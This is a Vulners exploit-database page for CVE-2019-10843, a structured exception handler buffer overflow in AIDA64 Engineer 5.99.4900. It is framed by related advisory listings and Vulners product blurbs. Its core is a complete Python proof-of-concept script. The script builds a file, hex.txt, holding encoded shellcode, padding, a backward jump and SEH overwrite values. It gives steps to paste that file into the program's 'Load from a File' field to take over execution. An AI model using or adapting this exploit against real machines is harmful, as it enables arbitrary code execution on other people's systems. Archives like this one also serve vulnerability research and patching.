Vulners
Lucene search
AIDA64 Engineer 5.99.4900 - Load from file Field Buffer Overflow (SEH) Exploit
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | CVE-2019-10843 | 10 Apr 201914:39 | – | cve |
 | CVE-2019-10843 | 10 Apr 201914:39 | – | cvelist |
 | AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH) | 4 Apr 201900:00 | – | exploitdb |
 | AIDA64 Engineer 5.99.4900 - Load from file Field Buffer Overflow (SEH) | 4 Apr 201900:00 | – | exploitpack |
 | CVE-2019-10843 | 10 Apr 201915:15 | – | nvd |
 | AIDA64 Engineer 5.99.4900 Buffer Overflow | 4 Apr 201900:00 | – | packetstorm |
#!/usr/bin/python
###############################################################################
# Exploit Title: AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)
# Exploit Author: Anurag Srivastava and Vardan Bansal
# Website: www.theanuragsrivastava.in
# Vulnerable Software: AIDA64 Engineer
# Vendor Homepage: http://download.aida64.com/
# Version: 5.99.4900
# Software Link: http://download.aida64.com/aida64engineer599.exe
# Tested On: Windows 7 x64
# CVE: CVE-2019-10843
#
# To reproduce the exploit:
# 1. Click Report
# 2. In the "Load from a File" field, paste the content of hex.txt
#
##############################################################################
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nSEH = "\xeb\xf9\x90\x90"
back = "\xe9\xdc\xfe\xff\xff" # jmp back to start of shellcode
SEH = "\x23\x02\x1c\x01" #pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READWRITE} [aida64.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.99.4900 (C:\Program Files\FinalWire\AIDA64 Engineer\aida64.exe
buffer = "\x41" * (292-len(buf)-len(back))
padding = "\x42"*(500-292-4-4)
data = buf + buffer + back + nSEH + SEH + padding
f = open ("hex.txt", "w")
f.write(data)
f.close()
# 0day.today [2019-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Apr 2019 00:00Current